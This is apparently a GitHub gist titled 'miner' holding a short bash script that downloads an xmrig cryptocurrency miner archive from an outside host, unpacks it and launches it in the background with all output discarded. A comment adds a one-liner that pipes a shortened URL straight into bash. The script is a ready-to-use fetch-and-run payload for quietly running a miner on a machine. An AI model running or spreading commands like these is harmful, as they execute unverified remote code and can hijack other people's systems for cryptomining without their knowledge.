Skip to content

Instantly share code, notes, and snippets.

@tiancheng91
Last active May 26, 2018 03:32
Show Gist options
  • Save tiancheng91/4722266e5fb8b9d2b5e188cc6ba5bcd4 to your computer and use it in GitHub Desktop.
Save tiancheng91/4722266e5fb8b9d2b5e188cc6ba5bcd4 to your computer and use it in GitHub Desktop.
miner
#!/bin/bash
"""
curl -L git.io/xmrig | bash
"""
wget http://tools.uu9.org/xmrig.tar.gz && tar -zxvf xmrig.tar.gz
cd xmrig
nohup ./xmrig -c config.json > /dev/null 2>&1 &
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment